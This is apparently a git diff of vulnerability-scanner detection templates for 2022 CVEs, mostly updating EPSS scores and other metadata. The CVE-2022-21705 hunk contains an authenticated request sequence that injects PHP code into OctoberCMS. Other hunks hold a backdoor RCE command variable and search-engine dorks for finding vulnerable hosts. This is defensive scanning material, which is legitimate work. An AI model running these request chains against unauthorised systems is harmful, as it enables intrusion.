+ epss-percentile: 0.38112
metadata:
max-request: 3
vendor: microweber
diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml
index 0757f6d2c7..0d50f91768 100644
--- a/http/cves/2022/CVE-2022-1007.yaml
+++ b/http/cves/2022/CVE-2022-1007.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00112
cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.43971
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml
index e9eea8b993..9d777dff1b 100644
--- a/http/cves/2022/CVE-2022-1013.yaml
+++ b/http/cves/2022/CVE-2022-1013.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1013
cwe-id: CWE-89
- epss-score: 0.01018
+ epss-score: 0.01144
cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml
index 9df09c8dd3..b80d5108f4 100644
--- a/http/cves/2022/CVE-2022-1020.yaml
+++ b/http/cves/2022/CVE-2022-1020.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-352
epss-score: 0.00614
cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.76048
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml
index c9b4dfd36b..0258c25b77 100644
--- a/http/cves/2022/CVE-2022-1040.yaml
+++ b/http/cves/2022/CVE-2022-1040.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1040
cwe-id: CWE-287
- epss-score: 0.97468
+ epss-score: 0.97499
cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99961
metadata:
max-request: 1
shodan-query: http.title:"Sophos"
diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml
index b0c26afb10..cb54c8285a 100644
--- a/http/cves/2022/CVE-2022-1054.yaml
+++ b/http/cves/2022/CVE-2022-1054.yaml
@@ -12,8 +12,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-1054
cwe-id: CWE-862
- epss-score: 0.00348
+ epss-score: 0.0033
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.67328
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml
index 4ac02df774..dd62369a81 100644
--- a/http/cves/2022/CVE-2022-1057.yaml
+++ b/http/cves/2022/CVE-2022-1057.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1057
cwe-id: CWE-89
- epss-score: 0.01364
+ epss-score: 0.01851
cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8685
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml
index 66fbe06f71..32368a8832 100644
--- a/http/cves/2022/CVE-2022-1058.yaml
+++ b/http/cves/2022/CVE-2022-1058.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00112
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
+ epss-percentile: 0.43971
metadata:
max-request: 2
shodan-query: title:"Gitea"
diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml
index 51f847bcf3..b0fdc4675e 100644
--- a/http/cves/2022/CVE-2022-1119.yaml
+++ b/http/cves/2022/CVE-2022-1119.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1119
cwe-id: CWE-22
- epss-score: 0.22681
+ epss-score: 0.29102
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96285
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml
index 937979f9eb..c90f990cb6 100644
--- a/http/cves/2022/CVE-2022-1162.yaml
+++ b/http/cves/2022/CVE-2022-1162.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-798
epss-score: 0.20604
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.95726
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml
index 629025bae4..e5e4e13ace 100644
--- a/http/cves/2022/CVE-2022-1168.yaml
+++ b/http/cves/2022/CVE-2022-1168.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00112
cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.43971
metadata:
max-request: 1
google-query: inurl:"wp-content/plugins/wp-jobsearch"
diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml
index 808806f13a..080c66e946 100644
--- a/http/cves/2022/CVE-2022-1221.yaml
+++ b/http/cves/2022/CVE-2022-1221.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml
index 6650a6aabf..e3c5049c73 100644
--- a/http/cves/2022/CVE-2022-1329.yaml
+++ b/http/cves/2022/CVE-2022-1329.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-1329
cwe-id: CWE-434,CWE-862
- epss-score: 0.96563
+ epss-score: 0.96419
cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99372
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml
index 85ace3beff..4a03063335 100644
--- a/http/cves/2022/CVE-2022-1386.yaml
+++ b/http/cves/2022/CVE-2022-1386.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1386
cwe-id: CWE-918
- epss-score: 0.0683
+ epss-score: 0.08014
cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93446
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml
index c3e44df4bd..328923db65 100644
--- a/http/cves/2022/CVE-2022-1388.yaml
+++ b/http/cves/2022/CVE-2022-1388.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1388
cwe-id: CWE-306
- epss-score: 0.9747
+ epss-score: 0.9748
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9995
metadata:
max-request: 2
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml
index 38d76b2b10..0ee9dfb5a7 100644
--- a/http/cves/2022/CVE-2022-1390.yaml
+++ b/http/cves/2022/CVE-2022-1390.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1390
cwe-id: CWE-22
- epss-score: 0.96598
+ epss-score: 0.96676
cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99485
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml
index 3fcddf7b5c..3f89e4dd0a 100644
--- a/http/cves/2022/CVE-2022-1391.yaml
+++ b/http/cves/2022/CVE-2022-1391.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1391
cwe-id: CWE-22
- epss-score: 0.01865
+ epss-score: 0.02167
cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87921
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml
index a6f0cf1685..e279300c76 100644
--- a/http/cves/2022/CVE-2022-1392.yaml
+++ b/http/cves/2022/CVE-2022-1392.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1392
cwe-id: CWE-22
- epss-score: 0.01015
+ epss-score: 0.01182
cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83293
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml
index 8e0a460c7b..ea8e1b5749 100644
--- a/http/cves/2022/CVE-2022-1398.yaml
+++ b/http/cves/2022/CVE-2022-1398.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-1398
cwe-id: CWE-918
- epss-score: 0.00308
+ epss-score: 0.0048
cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.72781
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml
index dff86b949d..789f35f5d3 100644
--- a/http/cves/2022/CVE-2022-1439.yaml
+++ b/http/cves/2022/CVE-2022-1439.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1439
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00113
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44027
metadata:
max-request: 1
shodan-query: http.favicon.hash:780351152
diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml
index 7559a4e70e..4a693ec9e3 100644
--- a/http/cves/2022/CVE-2022-1442.yaml
+++ b/http/cves/2022/CVE-2022-1442.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1442
cwe-id: CWE-862
- epss-score: 0.02422
+ epss-score: 0.07166
cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93146
metadata:
max-request: 2
google-query: inurl:/wp-content/plugins/metform
diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml
index 6b217c3e62..e4f850a1d0 100644
--- a/http/cves/2022/CVE-2022-1574.yaml
+++ b/http/cves/2022/CVE-2022-1574.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1574
cwe-id: CWE-352
- epss-score: 0.0306
+ epss-score: 0.02682
cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89096
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml
index 2297ac5491..26b4d3968d 100644
--- a/http/cves/2022/CVE-2022-1595.yaml
+++ b/http/cves/2022/CVE-2022-1595.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-1595
cwe-id: CWE-200
- epss-score: 0.0015
+ epss-score: 0.0018
cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54465
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml
index 9da75d75a1..8d7db98bf4 100644
--- a/http/cves/2022/CVE-2022-1597.yaml
+++ b/http/cves/2022/CVE-2022-1597.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00252
cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.62319
metadata:
max-request: 2
google-query: inurl:/wp-content/plugins/wpqa
diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml
index d656c89498..6bb2f4d395 100644
--- a/http/cves/2022/CVE-2022-1598.yaml
+++ b/http/cves/2022/CVE-2022-1598.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-1598
cwe-id: CWE-306
- epss-score: 0.01854
+ epss-score: 0.02766
cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89258
metadata:
max-request: 1
google-query: inurl:/wp-content/plugins/wpqa
diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml
index 99e9c16d71..2f24f3a371 100644
--- a/http/cves/2022/CVE-2022-1609.yaml
+++ b/http/cves/2022/CVE-2022-1609.yaml
@@ -8,16 +8,15 @@ info:
reference:
- https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2022-1609
+ cwe-id: CWE-77
metadata:
max-request: 1
verified: false
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cve-id: CVE-2022-1609
- cwe-id: CWE-77
tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress
-
variables:
cmd: "echo CVE-2022-1609 | rev"
diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml
index 8b15ca056f..30d7c9b456 100644
--- a/http/cves/2022/CVE-2022-1713.yaml
+++ b/http/cves/2022/CVE-2022-1713.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1713
cwe-id: CWE-918
- epss-score: 0.00708
+ epss-score: 0.00967
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81398
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml
index ea236c8ff0..5f2d3d7231 100644
--- a/http/cves/2022/CVE-2022-1724.yaml
+++ b/http/cves/2022/CVE-2022-1724.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1724
cwe-id: CWE-79
- epss-score: 0.001
+ epss-score: 0.00119
cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml
index a277f57809..66bd61419d 100644
--- a/http/cves/2022/CVE-2022-1756.yaml
+++ b/http/cves/2022/CVE-2022-1756.yaml
@@ -6,21 +6,27 @@ info:
severity: medium
description: |
The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
- remediation: Fixed in version 7.4.5
reference:
- https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072
- https://nvd.nist.gov/vuln/detail/CVE-2022-1756
- https://wordpress.org/plugins/newsletter/
+ remediation: Fixed in version 7.4.5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1756
cwe-id: CWE-79
+ epss-score: 0.00099
+ cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40272
metadata:
verified: true
publicwww-query: "/wp-content/plugins/newsletter/"
max-request: 2
- tags: cve,cve2022,newsletter,xss,authenticated
+ framework: wordpress
+ vendor: thenewsletterplugin
+ product: newsletter
+ tags: wpscan,cve,cve2022,newsletter,xss,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml
index ff5961fb7d..f6f92d056e 100644
--- a/http/cves/2022/CVE-2022-1768.yaml
+++ b/http/cves/2022/CVE-2022-1768.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1768
cwe-id: CWE-89
- epss-score: 0.67513
+ epss-score: 0.63139
cpe: cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97399
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml
index 572e6fb021..d1fc8cd683 100644
--- a/http/cves/2022/CVE-2022-1815.yaml
+++ b/http/cves/2022/CVE-2022-1815.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-1815
cwe-id: CWE-918,CWE-200
- epss-score: 0.00637
+ epss-score: 0.0087
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80286
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml
index 324087e64f..bf639ebac9 100644
--- a/http/cves/2022/CVE-2022-1883.yaml
+++ b/http/cves/2022/CVE-2022-1883.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-1883
cwe-id: CWE-89
- epss-score: 0.11165
+ epss-score: 0.12349
cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94679
metadata:
max-request: 1
vendor: camptocamp
diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml
index e771bc8b1f..d95ec4861f 100644
--- a/http/cves/2022/CVE-2022-1903.yaml
+++ b/http/cves/2022/CVE-2022-1903.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2022-1903
cwe-id: CWE-862
- epss-score: 0.2399
+ epss-score: 0.31334
cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96409
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml
index 75a35b4ed9..4ceca94931 100644
--- a/http/cves/2022/CVE-2022-1904.yaml
+++ b/http/cves/2022/CVE-2022-1904.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00097
cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml
index 12586692f6..0acc0e73ea 100644
--- a/http/cves/2022/CVE-2022-1906.yaml
+++ b/http/cves/2022/CVE-2022-1906.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1906
cwe-id: CWE-79
- epss-score: 0.00092
+ epss-score: 0.001
cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40471
metadata:
max-request: 1
google-query: inurl:/wp-content/plugins/digiproveblog
diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml
index 43ebae10cb..7954c5798e 100644
--- a/http/cves/2022/CVE-2022-1910.yaml
+++ b/http/cves/2022/CVE-2022-1910.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1910
cwe-id: CWE-79
- epss-score: 0.00078
+ epss-score: 0.00119
cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml
index 685fdb3f5b..6bd8b97fca 100644
--- a/http/cves/2022/CVE-2022-1916.yaml
+++ b/http/cves/2022/CVE-2022-1916.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00097
cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml
index 204339f4eb..5a2bc04f0c 100644
--- a/http/cves/2022/CVE-2022-1933.yaml
+++ b/http/cves/2022/CVE-2022-1933.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1933
cwe-id: CWE-79
- epss-score: 0.00092
+ epss-score: 0.00097
cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml
index bdcdaf0428..8e1fbee0e0 100644
--- a/http/cves/2022/CVE-2022-1937.yaml
+++ b/http/cves/2022/CVE-2022-1937.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-1937
cwe-id: CWE-79
- epss-score: 0.00092
+ epss-score: 0.00097
cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml
index ab9d3a0720..22260c128a 100644
--- a/http/cves/2022/CVE-2022-1946.yaml
+++ b/http/cves/2022/CVE-2022-1946.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00097
cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/gallery-album/"
diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml
index 0ba4a5202e..0ec4a6eea1 100644
--- a/http/cves/2022/CVE-2022-1952.yaml
+++ b/http/cves/2022/CVE-2022-1952.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-1952
cwe-id: CWE-434
- epss-score: 0.96089
+ epss-score: 0.95933
cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99225
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml
index 543b33b431..36693fe41d 100644
--- a/http/cves/2022/CVE-2022-2034.yaml
+++ b/http/cves/2022/CVE-2022-2034.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-639
- epss-score: 0.00511
+ epss-score: 0.00569
cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.75021
metadata:
max-request: 100
verified: true
diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml
index 101fbb8c9d..d23411f96e 100644
--- a/http/cves/2022/CVE-2022-21371.yaml
+++ b/http/cves/2022/CVE-2022-21371.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-21371
cwe-id: CWE-22
- epss-score: 0.96639
+ epss-score: 0.96287
cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99331
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml
index 4cb90ce2d7..0564058e8f 100644
--- a/http/cves/2022/CVE-2022-21500.yaml
+++ b/http/cves/2022/CVE-2022-21500.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-21500
- epss-score: 0.96395
+ epss-score: 0.95664
cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99159
metadata:
max-request: 1
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml
index ecb9d963dc..18d512a3da 100644
--- a/http/cves/2022/CVE-2022-21587.yaml
+++ b/http/cves/2022/CVE-2022-21587.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
- cwe-id: CWE-94
- epss-score: 0.97334
+ cwe-id: CWE-306
+ epss-score: 0.97288
cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99785
metadata:
max-request: 3
vendor: oracle
diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml
index 7e4495e59c..d5f030c58f 100644
--- a/http/cves/2022/CVE-2022-21661.yaml
+++ b/http/cves/2022/CVE-2022-21661.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-21661
cwe-id: CWE-89
- epss-score: 0.93457
+ epss-score: 0.93816
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98788
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml
index 839729e492..be8bbeb77c 100644
--- a/http/cves/2022/CVE-2022-21705.yaml
+++ b/http/cves/2022/CVE-2022-21705.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-21705
cwe-id: CWE-74
- epss-score: 0.00405
+ epss-score: 0.00519
cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73816
metadata:
max-request: 5
vendor: octobercms
@@ -31,14 +32,12 @@ http:
- | # to obtain session_key and token
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
-
- | # to perform authentication and obtain admin cookies
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
-
- | # to inject php code in Markup editor and perform exploit
POST /backend/cms HTTP/1.1
Host: {{Hostname}}
@@ -48,7 +47,6 @@ http:
X-Requested-With: XMLHttpRequest
_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
-
- | # to obtain theme
POST /backend/cms HTTP/1.1
Host: {{Hostname}}
@@ -58,7 +56,6 @@ http:
X-Requested-With: XMLHttpRequest
_session_key={{session_key}}&_token={{token}}&search=&type=page
-
- | # to access the template page for generated exploit
POST /backend/cms HTTP/1.1
Host: {{Hostname}}
@@ -70,6 +67,7 @@ http:
_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
@@ -113,4 +111,4 @@ http:
internal: true
part: body
- # Obtain current theme used for Markup editor of OctoberCMS
+# Obtain current theme used for Markup editor of OctoberCMS
diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml
index b2c4afd169..58d43810b8 100644
--- a/http/cves/2022/CVE-2022-2185.yaml
+++ b/http/cves/2022/CVE-2022-2185.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-2185
- cwe-id: CWE-732
- epss-score: 0.41002
+ cwe-id: CWE-78
+ epss-score: 0.46606
